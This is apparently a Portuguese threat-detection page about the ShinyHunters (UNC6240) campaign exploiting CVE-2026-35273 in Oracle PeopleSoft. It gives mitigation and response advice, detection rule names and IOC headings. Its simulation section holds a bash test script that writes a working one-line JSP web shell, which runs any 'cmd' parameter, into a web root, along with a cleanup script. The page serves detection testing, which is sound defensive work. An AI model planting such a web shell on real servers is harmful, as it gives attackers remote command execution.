ShinyHunters Retoma Ataques em Grande Escala Visando Oracle PeopleSoft
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O ator da ameaça UNC6240 (ShinyHunters) retomou a exploração em larga escala de sistemas Oracle PeopleSoft através da CVE-2026-35273. A campanha utiliza caminhos codificados em URL para contornar Firewalls de Aplicações Web (WAF) e acessar o ponto de extremidade vulnerável do Hub de Gerenciamento de Ambiente. Os atacantes implantam múltiplos shells web juntamente com o backdoor SIDEEYE para estabelecer persistência, manter acesso não autorizado e facilitar a exfiltração de dados.
Investigação
Mandiant e Google Threat Intelligence Group documentaram uma transição da exploração de dia zero em junho de 2026 para ataques de N-days contra ambientes não corrigidos. Pesquisadores identificaram o uso de codificação URL (/PSEMHUB/) para evitar a filtragem de strings baseada em WAF. A análise revelou uma sequência de ataque recorrente envolvendo a validação de alvos através de objetos Java serializados, seguida pela implantação de instaladores trojanizados e utilitários de tunelamento.
Mitigação
As organizações devem instalar imediatamente o patch de Alerta de Segurança da Oracle que aborda a CVE-2026-35273 e desabilitar ou remover o aplicativo PSEMHUB. As configurações do WAF devem inspecionar e bloquear caminhos de URL normalizados em vez de depender exclusivamente da correspondência literal de strings. As equipes de segurança também devem rotacionar credenciais acessíveis do nível web e examinar diretórios de aplicativos em busca de arquivos suspeitos ou não autorizados.
Resposta
Se um shell web for descoberto, os defensores devem considerar o host afetado como totalmente comprometido e preservar evidências forenses antes de iniciar a remediação. Ativar auditoria em nível de host para identificar processos de shell inesperados lançados pelo processo Java do WebLogic. Rotacionar credenciais expostas, incluindo strings de conexão de banco de dados e credenciais de nuvem, enquanto revisa atividades de rede de saída em busca de indicadores de C2 conhecidos.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Possível Enumeração do Sistema (via linha de comando)
Comando e Controle Suspeito por Solicitação DNS de Domínio de Topo (TLD) Incomum (via dns)
Possível Manipulação de Strings Codificadas em Base64 (via linha de comando)
Upload / Download Remoto de Arquivo via Ferramentas Padrão (via linha de comando)
IOCs (HashSha256) para detectar: Campanha de Exploração em Massa Renovada dos ShinyHunters Alvejando Oracle PeopleSoft
IOCs (SourceIP) para detectar: Campanha de Exploração em Massa Renovada dos ShinyHunters Alvejando Oracle PeopleSoft
IOCs (DestinationIP) para detectar: Campanha de Exploração em Massa Renovada dos ShinyHunters Alvejando Oracle PeopleSoft
Implantação de Shell Web via Exploração da CVE-2026-35273 [Criação de Processo no Windows]
Exploração pela UNC6240 do Oracle PeopleSoft usando Web Shells [Servidor Web]
Execução de Simulação
-
Narrativa do Ataque & Comandos: O adversário identifica uma instância do Oracle PeopleSoft e procura explorar uma vulnerabilidade. Para contornar assinaturas WAF simples que procuram a string “PSEMHUB”, o atacante usa codificação de URL para solicitar
/PSEMHUB/. Após a exploração bem-sucedida, o atacante insere um shell web chamadox.jspna raiz da web para fornecer uma interface persistente para a execução de comandos. Esta sequência imita os indicadores específicos de comprometimento (IOCs) identificados na campanha de exploração da UNC6240. -
Script de Teste de Regressão:
#!/bin/bash # Script de Simulação para Detecção de Shell Web UNC6240 # 1. Definir caminhos (Ajustar com base no ambiente de destino) WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" TARGET_URL="http://localhost/PSEMHUB/" echo "[+] Criando shell web simulado: $WEB_ROOT/$SHELL_NAME" # Criar um conteúdo simples de shell web JSP echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null echo "[+] Disparando detecção via solicitação codificada por URL..." # Use curl para solicitar o caminho codificado para gerar a entrada no log curl -s "$TARGET_URL" > /dev/null echo "[+] Simulação completa. Verifique o SIEM para detecção." -
Comandos de Limpeza:
#!/bin/bash # Script de Limpeza WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" echo "[+] Limpando arquivos de simulação..." sudo rm -f $WEB_ROOT/$SHELL_NAME echo "[+] Limpeza finalizada."